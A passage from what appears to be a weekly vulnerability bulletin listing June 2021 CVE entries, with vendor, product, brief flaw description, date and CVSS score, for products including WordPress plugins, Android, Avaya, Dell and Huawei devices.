zettlr — zettlr No filtering of cross-site scripting (XSS) payloads in the markdown-editor in Zettlr 1.8.7 allows attackers to perform remote code execution via a crafted file. 2021-06-18 4.3 CVE-2021-26835
MISC
MISC
zziplib_project — zziplib Infinite Loop in zziplib v0.13.69 allows remote attackers to cause a denial of service via the return value “zzip_file_read” in the function “unzzip_cat_file”. 2021-06-18 4.3 CVE-2020-18442
MISC


Low Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
admincolumns — admin_columns The Admin Columns Free WordPress plugin before 4.3 and Admin Columns Pro WordPress plugin before 5.5.1 rendered the value of the 'Label' field on posted pages without proper input validation; an authenticated attacker can take advantage of this to supply an arbitrary crafted script and have it executed. 2021-06-21 3.5 CVE-2021-24366
CONFIRM
MISC
autoptimize — autoptimize The Autoptimize WordPress plugin before 2.7.8 does not check for malicious files such as .html in the archive uploaded via the ‘Import Settings’ feature. As a result, it is possible for a high privilege user to upload a malicious file containing JavaScript code inside an archive which will execute when a victim visits index.html inside the plugin directory. 2021-06-21 3.5 CVE-2021-24378
CONFIRM
ayecode — getpaid In the GetPaid WordPress plugin before 2.3.4, users with the contributor role and above can create a new Payment Form, however the Label and Help Text input fields were not getting sanitized properly. So it was possible to inject malicious content such as img tags, leading to a Stored Cross-Site Scripting issue which is triggered when the form will be edited, for example when an admin reviews it and could lead to privilege escalation. 2021-06-21 3.5 CVE-2021-24369
CONFIRM
checksec — canopy CheckSec Canopy before 3.5.2 allows XSS attacks against the login page via the LOGIN_PAGE_DISCLAIMER parameter. 2021-06-18 3.5 CVE-2021-34815
MISC
MISC
MISC
codecabin — wp_google_maps The WP Google Maps WordPress plugin before 8.1.12 did not sanitise, validate or escape the Map Name when output in the Map List of the admin dashboard, leading to an authenticated Stored Cross-Site Scripting issue. 2021-06-21 3.5 CVE-2021-24383
CONFIRM
MISC
get-simple — getsimplecms Cross Site Scripting vulnerability in GetSimpleCMS 3.4.0a in admin/snippets.php via (1) Add Snippet and (2) Save snippets. 2021-06-23 3.5 CVE-2020-20391
MISC
get-simple — getsimplecms Cross Site Scripting vulnerability in GetSimpleCMS 3.3.16 in admin/upload.php by adding comments or jpg and other file header information to the content of xla, pages, and gzip files. 2021-06-23 3.5 CVE-2021-28977
MISC
get-simple — getsimplecms Cross Site Scripting (XSS) vulnerability in GetSimpleCMS 3.4.0a in admin/edit.php. 2021-06-23 3.5 CVE-2020-20389
MISC
google — android In onStart of ContactsDumpActivity.java, there is possible access to contacts due to a tapjacking/overlay attack. This could lead to local information disclosure with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-174045870. 2021-06-22 1.9 CVE-2021-0569
MISC
google — android In sspRequestCallback of BondStateMachine.java, there is a possible leak of Bluetooth MAC addresses due to log information disclosure. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-183961896. 2021-06-22 2.1 CVE-2021-0549
MISC
google — android In doNotification of AccountManagerService.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-177931355. 2021-06-22 2.1 CVE-2021-0572
MISC
google — android In accessAudioHalPidscpp of TimeCheck.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-175894436. 2021-06-22 2.1 CVE-2021-0566
MISC
google — android In ih264e_fmt_conv_422i_to_420sp of ih264e_fmt_conv.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-172908358. 2021-06-22 2.1 CVE-2021-0563
MISC
google — android In RasterIntraUpdate of motion_est.cpp, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-176084648. 2021-06-22 2.1 CVE-2021-0562
MISC
google — android In append_to_verify_fifo_interleaved_ of stream_encoder.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-174302683. 2021-06-22 2.1 CVE-2021-0561
MISC
google — android In getBlockSum of fastcodemb.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-172716941. 2021-06-22 2.1 CVE-2021-0556
MISC
google — android In isBackupServiceActive of BackupManagerService.java, there is a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-158482162. 2021-06-22 2.1 CVE-2021-0554
MISC
google — android In getEndItemSliceAction of MediaOutputSlice.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-175124820. 2021-06-22 2.1 CVE-2021-0552
MISC
google — android In updateNotification of BeamTransferManager.java, there is a missing permission check. This could lead to local information disclosure of paired Bluetooth addresses with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-168712890. 2021-06-22 2.1 CVE-2021-0542
MISC
google — android In phNxpNciHal_ext_process_nfc_init_rsp of phNxpNciHal_ext.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure in the NFC server with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-169258455. 2021-06-22 2.1 CVE-2021-0541
MISC
google — android In getAllPackages of PackageManagerService, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure of cross-user permissions with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-8.1, Android-9, Android-10. Android ID: A-174661955. 2021-06-21 2.1 CVE-2021-0521
MISC
google — android In avrc_pars_browse_rsp of avrc_pars_ct.cc, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-179162665. 2021-06-21 3.3 CVE-2021-0504
MISC
icehrm — icehrm A stored cross site scripting (XSS) vulnerability was discovered in Ice Hrm 29.0.0.OS which allows attackers to execute arbitrary web scripts or HTML via a crafted file uploaded into the Document Management tab. The exploit is triggered when a user visits the upload location of the crafted file. 2021-06-22 3.5 CVE-2021-34243
MISC
jpress — jpress An issue was discovered in JPress v3.3.0 and below. There are XSS vulnerabilities in the template module and tag management module. If an attacker logs in to the back end by means of a weak password, stored XSS can occur. 2021-06-18 3.5 CVE-2021-33347
MISC
MISC
phpgurukul — hospital_management_system_in_php PHPGurukul Hospital Management System in PHP v4.0 has a Persistent Cross-Site Scripting vulnerability in hmsadminappointment-history.php. Remote registered users can exploit the vulnerability to obtain user cookie data. 2021-06-22 3.5 CVE-2020-22167
MISC
podsfoundation — pods The Pods – Custom Content Types and Fields WordPress plugin before 2.7.27 was vulnerable to an Authenticated Stored Cross-Site Scripting (XSS) security vulnerability within the ‘Menu Label’ field parameter. 2021-06-21 3.5 CVE-2021-24339
MISC
CONFIRM
podsfoundation — pods The Pods – Custom Content Types and Fields WordPress plugin before 2.7.27 was vulnerable to an Authenticated Stored Cross-Site Scripting (XSS) security vulnerability within the ‘Singular Label’ field parameter. 2021-06-21 3.5 CVE-2021-24338
CONFIRM
MISC
wp_config_file_editor_project — wp_config_file_editor The WP Config File Editor WordPress plugin through 1.7.1 was affected by an Authenticated Stored Cross-Site Scripting (XSS) vulnerability. 2021-06-21 3.5 CVE-2021-24367
CONFIRM
znote — znote A cross-site scripting (XSS) vulnerability exists in Znote 0.5.2. An attacker can insert payloads, and the code execution will happen immediately on markdown view mode. 2021-06-18 3.5 CVE-2021-26834
MISC
MISC
Severity Not Yet Assigned

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
advantech — webaccess_hmi_designer
 
Opening a maliciously crafted project file may cause an out-of-bounds write, which may allow an attacker to execute arbitrary code. User interaction is required on the WebAccess HMI Designer (versions 2.1.9.95 and prior). 2021-06-24 not yet calculated CVE-2021-33002
MISC
advantech — webaccess_hmi_designer
 
Parsing a maliciously crafted project file may cause a heap-based buffer overflow, which may allow an attacker to perform arbitrary code execution. User interaction is required on the WebAccess HMI Designer (versions 2.1.9.95 and prior). 2021-06-24 not yet calculated CVE-2021-33000
MISC
advantech — webaccess_hmi_designer
 
The affected product is vulnerable to memory corruption condition due to lack of proper validation of user supplied files, which may allow an attacker to execute arbitrary code. User interaction is required on the WebAccess HMI Designer (versions 2.1.9.95 and prior). 2021-06-24 not yet calculated CVE-2021-33004
MISC
ampache — ampache
 
Ampache is an open source web based audio/video streaming application and file manager. Due to a lack of input filtering versions 4.x.y are vulnerable to code injection in random.php. The attack requires user authentication to access the random.php page unless the site is running in demo mode. This issue has been resolved in 4.4.3. 2021-06-22 not yet calculated CVE-2021-32644
CONFIRM
MISC
auth0 — auth0
 
The Auth0 Next.js SDK is a library for implementing user authentication in Next.js applications. Versions before and including `1.4.1` are vulnerable to reflected XSS. An attacker can execute arbitrary code by providing an XSS payload in the `error` query parameter which is then processed by the callback handler as an error message. You are affected by this vulnerability if you are using `@auth0/nextjs-auth0` version `1.4.1` or lower **unless** you are using custom error handling that does not return the error message in an HTML response. Upgrade to version `1.4.1` to resolve. The fix adds basic HTML escaping to the error message and it should not impact your users. 2021-06-25 not yet calculated CVE-2021-32702
MISC
CONFIRM
MISC
autodesk — autodesk_dwg
 
An Arbitrary Address Write issue in the Autodesk DWG application can allow a malicious user to leverage the application to write in unexpected paths. In order to exploit this the attacker would need the victim to enable full page heap in the application. 2021-06-25 not yet calculated CVE-2021-27043
MISC
autodesk — dwg
 
A maliciously crafted DWG file can be used to write beyond the allocated buffer while parsing DWG files. This vulnerability can be exploited to execute arbitrary code. 2021-06-25 not yet calculated CVE-2021-27041
MISC
autodesk — dwg
 
A maliciously crafted DWG file can be used to write beyond the allocated buffer while parsing DWG files. The vulnerability exists because the application fails to handle a crafted DWG file, which causes an unhandled exception. An attacker can leverage this vulnerability to execute arbitrary code. 2021-06-25 not yet calculated CVE-2021-27042
MISC
autodesk — dwg
 
A maliciously crafted DWG file can be forced to read beyond allocated boundaries when parsing the DWG file. This vulnerability can be exploited to execute arbitrary code. 2021-06-25 not yet calculated CVE-2021-27040
MISC
avaya — aura_appliance_virtualization_platform_utilities
 
A privilege escalation vulnerability was discovered in Avaya Aura Appliance Virtualization Platform Utilities (AVPU) that may potentially allow a local user to escalate privileges. Affects 8.0.0.0 through 8.1.3.1 versions of AVPU. 2021-06-24 not yet calculated CVE-2021-25653
MISC
avaya — aura_appliance_virtualization_platform_utilities
 
An information disclosure vulnerability was discovered in the directory and file management of Avaya Aura Appliance Virtualization Platform Utilities (AVPU). This vulnerability may potentially allow any local user to access system functionality and configuration information that should only be available to a privileged user. Affects versions 8.0.0.0 through 8.1.3.1 of AVPU. 2021-06-24 not yet calculated CVE-2021-25652
MISC
avaya — aura_device_services
 
An arbitrary code execution vulnerability was discovered in Avaya Aura Device Services that may potentially allow a local user to execute specially crafted scripts. Affects 7.0 through 8.1.4.0 versions of Avaya Aura Device Services. 2021-06-25 not yet calculated CVE-2021-25654
MISC
avaya — aura_experience_portal
 
A vulnerability in the system Service Menu component of Avaya Aura Experience Portal may allow URL Redirection to any untrusted site through a crafted attack. Affected versions include 7.0 through 7.2.3 (without hotfix) and 8.0.0 (without hotfix). 2021-06-24 not yet calculated CVE-2021-25655
MISC
avaya — aura_experience_portal_web
 
Stored XSS injection vulnerabilities were discovered in the Avaya Aura Experience Portal Web management which could allow an authenticated user to potentially disclose sensitive information. Affected versions include 7.0 through 7.2.3 (without hotfix) and 8.0.0 (without hotfix). 2021-06-24 not yet calculated CVE-2021-25656
MISC
avaya — aura_utility_services
 
** UNSUPPORTED WHEN ASSIGNED ** An information disclosure vulnerability was discovered in the directory and file management of Avaya Aura Utility Services. This vulnerability may potentially allow any local user to access system functionality and configuration information that should only be available to a privileged user. Affects all 7.x versions of Avaya Aura Utility Services. 2021-06-24 not yet calculated CVE-2021-25649
MISC
avaya — aura_utility_services
 
** UNSUPPORTED WHEN ASSIGNED ** A privilege escalation vulnerability was discovered in Avaya Aura Utility Services that may potentially allow a local user to execute specially crafted scripts as a privileged user. Affects all 7.x versions of Avaya Aura Utility Services. 2021-06-24 not yet calculated CVE-2021-25650
MISC
avaya — aura_utility_services
 
** UNSUPPORTED WHEN ASSIGNED ** A privilege escalation vulnerability was discovered in Avaya Aura Utility Services that may potentially allow a local user to escalate privileges. Affects all 7.x versions of Avaya Aura Utility Services. 2021-06-24 not yet calculated CVE-2021-25651
MISC
ballerina-platform — ballerina-lang
 
Ballerina is an open source programming language and platform for cloud application programmers. Ballerina versions 1.2.x and SL releases up to alpha 3 have a potential for a supply chain attack via MiTM against users. Http connections did not make use of TLS and certificate checking was ignored. The vulnerability allows an attacker to substitute or modify packages retrieved from BC thus allowing to inject malicious code into ballerina executables. This has been patched in Ballerina 1.2.14 and Ballerina SwanLake alpha4. 2021-06-22 not yet calculated CVE-2021-32700
CONFIRM
MISC
bitdefender — bitdefender_total_security
 
Improper Certificate Validation vulnerability in the Online Threat Prevention module as used in Bitdefender Total Security allows an attacker to potentially bypass HTTP Strict Transport Security (HSTS) checks. This issue affects: Bitdefender Total Security versions prior to 25.0.7.29. Bitdefender Internet Security versions prior to 25.0.7.29. Bitdefender Antivirus Plus versions prior to 25.0.7.29. 2021-06-22 not yet calculated CVE-2020-15732
MISC
bluetooth — bluetooth_core_specifications
 
Unencrypted Bluetooth Low Energy baseband links in Bluetooth Core Specifications 4.0 through 5.2 may permit an adjacent device to inject a crafted packet during the receive window of the listening device before the transmitting device initiates its packet transmission to achieve full MITM status without terminating the link. When applied against devices establishing or using encrypted links, crafted packets may be used to terminate an existing link, but will not compromise the confidentiality or integrity of the link. 2021-06-25 not yet calculated CVE-2021-31615
MISC
MISC
catfish_cms — catfish_cms
 
A cross site scripting (XSS) vulnerability in Catfish CMS 4.9.90 allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the “announcement_gonggao” parameter. 2021-06-23 not yet calculated CVE-2020-23962
MISC
connectwise_automate — connectwise_automate
 
An XXE vulnerability exists in ConnectWise Automate before 2021.0.6.132. 2021-06-21 not yet calculated CVE-2021-35066
MISC
MISC
contao — contao
 
Contao 4.5.x through 4.9.x before 4.9.16, and 4.10.x through 4.11.x before 4.11.5, allows XSS. It is possible to inject code into the tl_log table that will be executed in the browser when the system log is called in the back end. 2021-06-23 not yet calculated CVE-2021-35210
CONFIRM
CONFIRM
crmeb — crmeb
 
CRMEB 3.1.0+ is vulnerable to File Upload Getshell via /crmeb/crmeb/services/UploadService.php. 2021-06-24 not yet calculated CVE-2020-21787
MISC
crmeb — crmeb
 
In CRMEB 3.1.0+ strict domain name filtering leads to SSRF(Server-Side Request Forgery). The vulnerable code is in file /crmeb/app/admin/controller/store/CopyTaobao.php. 2021-06-24 not yet calculated CVE-2020-21788
MISC
d-link — router
 
There is an arbitrary password modification vulnerability in a D-LINK DSL-2888A router product. An attacker can use this vulnerability to modify the password of the admin user without authorization. 2021-06-24 not yet calculated CVE-2021-33346
MISC
MISC
dell — biosconnect
 
Dell BIOSConnect feature contains a buffer overflow vulnerability. An authenticated malicious admin user with local access to the system may potentially exploit this vulnerability to run arbitrary code and bypass UEFI restrictions. 2021-06-24 not yet calculated CVE-2021-21573
CONFIRM
dell — biosconnect
 
Dell BIOSConnect feature contains a buffer overflow vulnerability. An authenticated malicious admin user with local access to the system may potentially exploit this vulnerability to run arbitrary code and bypass UEFI restrictions. 2021-06-24 not yet calculated CVE-2021-21574
CONFIRM
dell — biosconnect
 
Dell BIOSConnect feature contains a buffer overflow vulnerability. An authenticated malicious admin user with local access to the system may potentially exploit this vulnerability to run arbitrary code and bypass UEFI restrictions. 2021-06-24 not yet calculated CVE-2021-21572
CONFIRM
dell — uefi_bios
 
Dell UEFI BIOS https stack leveraged by the Dell BIOSConnect feature and Dell HTTPS Boot feature contains an improper certificate validation vulnerability. A remote unauthenticated attacker may exploit this vulnerability using a person-in-the-middle attack which may lead to a denial of service and payload tampering. 2021-06-24 not yet calculated CVE-2021-21571
CONFIRM
dhis2 — dhis2_core
 
DHIS 2 is an information system for data capture, management, validation, analytics and visualization. A SQL injection security vulnerability has been found in specific versions of DHIS2. This vulnerability affects the /api/trackedEntityInstances API endpoint in DHIS2 versions 2.34.4, 2.35.2, 2.35.3, 2.35.4, and 2.36.0. Earlier versions, such as 2.34.3 and 2.35.1 and all versions 2.33 and older are unaffected. The system is vulnerable to attack only from users that are logged in to DHIS2, and there is no known way of exploiting the vulnerability without first being logged in as a DHIS2 user. A successful exploit of this vulnerability could allow the malicious user to read, edit and delete data in the DHIS2 instance. There are no known exploits of the security vulnerabilities addressed by these patch releases. However, we strongly recommend that all DHIS2 implementations using versions 2.34, 2.35 and 2.36 install these patches as soon as possible. There is no straightforward known workaround for DHIS2 instances using the Tracker functionality other than upgrading the affected DHIS2 server to one of the patches in which this vulnerability has been fixed. For implementations which do NOT use Tracker functionality, it may be possible to block all network access to POST to the /api/trackedEntityInstance endpoint as a temporary workaround while waiting to upgrade. 2021-06-24 not yet calculated CVE-2021-32704
CONFIRM
djvulibre — djvulibre
 
A flaw was found in djvulibre-3.5.28 and earlier. An out of bounds write in function DJVU::filter_bv() via crafted djvu file may lead to application crash and other consequences. 2021-06-24 not yet calculated CVE-2021-32490
MISC
djvulibre — djvulibre
 
A flaw was found in djvulibre-3.5.28 and earlier. A heap buffer overflow in function DJVU::GBitmap::decode() via crafted djvu file may lead to application crash and other consequences. 2021-06-24 not yet calculated CVE-2021-32493
MISC
djvulibre — djvulibre
 
A flaw was found in djvulibre-3.5.28 and earlier. An out of bounds read in function DJVU::DataPool::has_data() via crafted djvu file may lead to application crash and other consequences. 2021-06-24 not yet calculated CVE-2021-32492
MISC
djvulibre — djvulibre
 
A flaw was found in djvulibre-3.5.28 and earlier. A Stack overflow in function DJVU::DjVuDocument::get_djvu_file() via crafted djvu file may lead to application crash and other consequences. 2021-06-24 not yet calculated CVE-2021-3500
MISC
djvulibre — djvulibre
 
A flaw was found in djvulibre-3.5.28 and earlier. An integer overflow in function render() in tools/ddjvu via crafted djvu file may lead to application crash and other consequences. 2021-06-24 not yet calculated CVE-2021-32491
MISC
eclipse — birt
 
In Eclipse BIRT versions 4.8.0 and earlier, an attacker can use query parameters to create a JSP file which is accessible from remote (current BIRT viewer dir) to inject JSP code into the running instance. 2021-06-25 not yet calculated CVE-2021-34427
CONFIRM
eclipse — jetty
 
For Eclipse Jetty versions <= 9.4.40, <= 10.0.2, <= 11.0.2, if an exception is thrown from the SessionListener#sessionDestroyed() method, then the session ID is not invalidated in the session ID manager. On deployments with clustered sessions and multiple contexts this can result in a session not being invalidated. This can result in an application used on a shared computer being left logged in. 2021-06-22 not yet calculated CVE-2021-34428
CONFIRM
MLIST
elabftw — elabftw
 
eLabFTW is an open source electronic lab notebook for research labs. This vulnerability allows an attacker to make GET requests on behalf of the server. It is “blind” because the attacker cannot see the result of the request. Issue has been patched in eLabFTW 4.0.0. 2021-06-21 not yet calculated CVE-2021-32698
MISC
CONFIRM
emote — interactive_remote_mouse
 
Emote Interactive Remote Mouse 3.008 on Windows allows attackers to execute arbitrary programs as Administrator by using the Image Transfer Folder feature to navigate to cmd.exe. It binds to local ports to listen for incoming connections. 2021-06-24 not yet calculated CVE-2021-35448
MISC
MISC
ethereum — ethereum
 
An issue was discovered in function addMeByRC in the smart contract implementation for RC, an Ethereum token, allows attackers to transfer an arbitrary amount of tokens to an arbitrary address. 2021-06-24 not yet calculated CVE-2020-17753
MISC
MISC
MISC
MISC
MISC
MISC
MISC
ethereum — ethereum
 
Integer overflow vulnerability in payable function of a smart contract implementation for an Ethereum token, as demonstrated by the smart contract implemented at address 0xB49E984A83d7A638E7F2889fc8328952BA951AbE, an implementation for MillionCoin (MON). 2021-06-24 not yet calculated CVE-2020-17752
MISC
MISC
etinet — backbox
 
ETINET BACKBOX E4.09 and H4.09 mismanages password access control. When a user uses the User ID of the process running BBSV to log in to the Backbox UI application, the system procedure (USER_AUTHENTICATE_) used for verifying the Password returns 0 (no error). The reason is that the user is not running the XYGate application. Hence, BBSV assumes the Password is correct. For H4.09, the affected version is T0954V04^AAO. For E4.09, the affected version is 22SEP2020. 2021-06-25 not yet calculated CVE-2021-33895
MISC
MISC
etuna — ec-cube
 
Cross-site scripting vulnerability in ETUNA EC-CUBE plugins (Delivery slip number plugin (3.0 series) 1.0.10 and earlier, Delivery slip number csv bulk registration plugin (3.0 series) 1.0.8 and earlier, and Delivery slip number mail plugin (3.0 series) 1.0.8 and earlier) allows remote attackers to inject an arbitrary script by executing a specific operation on the management page of EC-CUBE. 2021-06-22 not yet calculated CVE-2021-20735
MISC
MISC
MISC
MISC
evernote — evernote
 
An issue was found in the Evernote client for Windows 10, 7, and 2008 in the protocol handler. This enables attackers for arbitrary command execution if the user clicks on a specially crafted URL. AKA: WINNOTE-19941. 2021-06-24 not yet calculated CVE-2020-17759
MISC
f-secure — f-secure
 
A Denial-of-Service (DoS) vulnerability was discovered in F-Secure Linux Security whereby the FSAVD component used in certain F-Secure products can crash while scanning larger packages/fuzzed files. The exploit can be triggered remotely by an attacker. A successful attack will result in Denial-of-Service (DoS) of the Anti-Virus engine. 2021-06-21 not yet calculated CVE-2021-33572
MISC
MISC
fidelis_network_and_deception — fidelis_network_and_deception_commandpost
 
Vulnerability in Fidelis Network and Deception CommandPost enables authenticated command injection through the web interface. The vulnerability could allow a specially crafted HTTP request to execute system commands on the CommandPost and return results in an HTTP response in an authenticated session. The vulnerability is present in Fidelis Network and Deception versions prior to 9.3.7 and in version 9.4. Patches and updates are available to address this vulnerability. 2021-06-25 not yet calculated CVE-2021-35049
CONFIRM
fidelis_network_and_deception — fidelis_network_and_deception_commandpost
 
User credentials stored in a recoverable format within Fidelis Network and Deception CommandPost. In the event that an attacker gains access to the CommandPost, these values could be decoded and used to login to the application. The vulnerability is present in Fidelis Network and Deception versions prior to 9.3.3. This vulnerability has been addressed in version 9.3.3 and subsequent versions. 2021-06-25 not yet calculated CVE-2021-35050
CONFIRM
fidelis_network_and_deception — fidelis_network_and_deception_commandpost
 
Vulnerability in the CommandPost, Collector, and Sensor components of Fidelis Network and Deception enables an attacker with user level access to the CLI to inject root level commands into the component and neighboring Fidelis components. The vulnerability is present in Fidelis Network and Deception versions prior to 9.3.7 and in version 9.4. Patches and updates are available to address this vulnerability. 2021-06-25 not yet calculated CVE-2021-35047
CONFIRM
fidelis_network_and_deception — fidelis_network_and_deception_commandpost
 
Vulnerability in Fidelis Network and Deception CommandPost enables unauthenticated SQL injection through the web interface. The vulnerability could lead to exposure of authentication tokens in some versions of Fidelis software. The vulnerability is present in Fidelis Network and Deception versions prior to 9.3.7 and in version 9.4. Patches and updates are available to address this vulnerability. 2021-06-25 not yet calculated CVE-2021-35048
CONFIRM
fisco-bcos — fisco-bcos
 
The blockchain node in FISCO-BCOS V2.7.2 may have a bug when dealing with an unformatted packet, leading to a crash. A malicious node can send such a packet continuously. The packet is in an incorrect format and cannot be decoded by the node correctly. As a result, the node may consume memory continuously and crash. More details are shown at: github.com/FISCO-BCOS/FISCO-BCOS/issues/1951 2021-06-24 not yet calculated CVE-2021-35041
MISC
getsimplecms — getsimplecms
 
Remote Code Execution vulnerability in GetSimpleCMS before 3.3.16 in admin/upload.php via phar files. 2021-06-23 not yet calculated CVE-2021-28976
MISC
getsimplecms — getsimplecms
 
Cross Site Scripting (XSS) vulnerability in GetSimpleCMS <= 3.3.15 in admin/changedata.php via the redirect_url parameter and the headers_sent function. 2021-06-23 not yet calculated CVE-2020-18657
MISC
MISC
MISC
getsimplecms — getsimplecms
 
GetSimpleCMS <=3.3.15 has an open redirect in admin/changedata.php via the redirect function to the url parameter. 2021-06-23 not yet calculated CVE-2020-18660
MISC
MISC
MISC
gnuboard5 — gnuboard5
 
SQL Injection vulnerability in gnuboard5 <=v5.3.2.8 via the table_prefix parameter in install_db.php. 2021-06-24 not yet calculated CVE-2020-18662
MISC
MISC
MISC
gnuboard5 — gnuboard5
 
Cross Site Scripting (XSS) vulnerability in gnuboard5 <=v5.3.2.8 via the act parameter in bbs/move_update.php. 2021-06-24 not yet calculated CVE-2020-18663
MISC
MISC
MISC
gnuboard5 — gnuboard5
 
Cross Site Scripting (XSS) vulnerability in gnuboard5 <=v5.3.2.8 via the url parameter to bbs/login.php. 2021-06-24 not yet calculated CVE-2020-18661
MISC
MISC
MISC
google — android
 
Improper authorization in handler for custom URL scheme vulnerability in asken diet for Android versions from v.3.0.0 to v.4.2.x allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App. 2021-06-22 not yet calculated CVE-2021-20733
MISC
MISC
helpu — helpu
 
A vulnerability in the agent program of the HelpU remote control solution could allow an authenticated remote attacker to execute arbitrary commands. This vulnerability is due to insufficient input sanitization when communicating with the customer process. 2021-06-24 not yet calculated CVE-2020-7862
MISC
MISC
hitachi — application_server_help_server
 
Cross-site scripting vulnerability in Hitachi Application Server Help (Hitachi Application Server V10 Manual (Windows) version 10-11-01 and earlier and Hitachi Application Server V10 Manual (UNIX) version 10-11-01 and earlier) allows a remote attacker to inject an arbitrary script via unspecified vectors. 2021-06-22 not yet calculated CVE-2021-20741
MISC
MISC
hpe — oneview_global_dashboard
 
A potential vulnerability has been identified in HPE OneView Global Dashboard release 2.31 which could lead to a local disclosure of privileged information. HPE has provided an update to OneView Global Dashboard. The issue is resolved in 2.32. 2021-06-24 not yet calculated CVE-2021-26585
MISC
huawei — multiple products
 
There is an improper authorization vulnerability in eCNS280 V100R005C00, V100R005C10 and eSE620X vESS V100R001C10SPC200, V100R001C20SPC200. A file access is not authorized correctly. Attacker with low access may launch privilege escalation in a specific scenario. This may compromise the normal service. 2021-06-22 not yet calculated CVE-2021-22361
MISC
huawei — multiple products
 
There is an information leak vulnerability in Huawei products. A module does not deal with specific input sufficiently. High privilege attackers can exploit this vulnerability by performing some operations. This can lead to information leak. Affected product versions include: IPS Module versions V500R005C00, V500R005C10, V500R005C20; NGFW Module versions V500R005C00,V500R005C10, V500R005C20; SeMG9811 versions V500R005C00; USG9500 versions V500R001C00, V500R001C20, V500R001C30, V500R001C50, V500R001C60, V500R001C80, V500R005C00, V500R005C10, V500R005C20. 2021-06-22 not yet calculated CVE-2021-22342
MISC
huawei — multiple products
 
There is an out-of-bounds read vulnerability in eCNS280_TD V100R005C10 and eSE620X vESS V100R001C10SPC200, V100R001C20SPC200, V200R001C00SPC300. The vulnerability is due to a message-handling function that contains an out-of-bounds read vulnerability. An attacker can exploit this vulnerability by sending a specific message to the target device, which could cause a Denial of Service (DoS). 2021-06-22 not yet calculated CVE-2021-22383
MISC
huawei — multiple products
 
Huawei LTE USB Dongle products have an improper permission assignment vulnerability. An attacker can locally access and log in to a PC to induce a user to install a specially crafted application. After successfully exploiting this vulnerability, the attacker can perform unauthenticated operations. Affected product versions include:E3372 E3372h-153TCPU-V200R002B333D01SP00C00. 2021-06-22 not yet calculated CVE-2021-22382
MISC
huawei — multiple products
 
There is a race condition vulnerability in eCNS280_TD V100R005C00 and V100R005C10. There is a timing window in which the database can be operated on by another thread that is running concurrently. Successful exploit may cause the affected device to behave abnormally. 2021-06-22 not yet calculated CVE-2021-22378
MISC
huawei — multiple products
 
There is a command injection vulnerability in S12700 V200R019C00SPC500, S2700 V200R019C00SPC500, S5700 V200R019C00SPC500, S6700 V200R019C00SPC500 and S7700 V200R019C00SPC500. A module does not verify specific input sufficiently. Attackers can exploit this vulnerability by sending malicious parameters to inject command. This can compromise normal service. 2021-06-22 not yet calculated CVE-2021-22377
MISC
huawei — multiple products
 
There is an out-of-bounds read vulnerability in eSE620X vESS V100R001C10SPC200, V100R001C20SPC200, V200R001C00SPC300. The vulnerability is due to a function that handles an internal message and contains an out-of-bounds read. An attacker could craft messages between system processes; successful exploit could cause Denial of Service (DoS). 2021-06-22 not yet calculated CVE-2021-22366
MISC
huawei — multiple products
 
There is an out of bounds read vulnerability in eSE620X vESS V100R001C10SPC200, V100R001C20SPC200, V200R001C00SPC300. A local attacker can exploit this vulnerability by sending a specific message to the target device. Due to insufficient validation of the internal message, successful exploit may cause the process and the service to behave abnormally. 2021-06-22 not yet calculated CVE-2021-22365
MISC
huawei — multiple products
 
There is a resource management error vulnerability in eCNS280_TD V100R005C10SPC650. An attacker needs to perform specific operations to exploit the vulnerability on the affected device. Due to improper resource management in the function, the vulnerability can be exploited to cause abnormal service on affected devices. 2021-06-22 not yet calculated CVE-2021-22363
MISC
ibm — db2
 
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.5 could allow a local user to access and change the configuration of Db2 due to a race condition of a symbolic link. IBM X-Force ID: 190909. 2021-06-24 not yet calculated CVE-2020-4885
CONFIRM
XF
ibm — db2
 
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 9.7, 10.1, 10.5, 11.1, and 11.5, under the specific circumstance of a table being dropped while being accessed in another session, could allow an authenticated user to cause a denial of service. IBM X-Force ID: 203031. 2021-06-24 not yet calculated CVE-2021-29777
XF
CONFIRM
ibm — db2
 
Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) is vulnerable to a denial of service as the server terminates abnormally when executing a specially crafted SELECT statement. IBM X-Force ID: 200659. 2021-06-24 not yet calculated CVE-2021-29703
CONFIRM
XF
ibm — db2
 
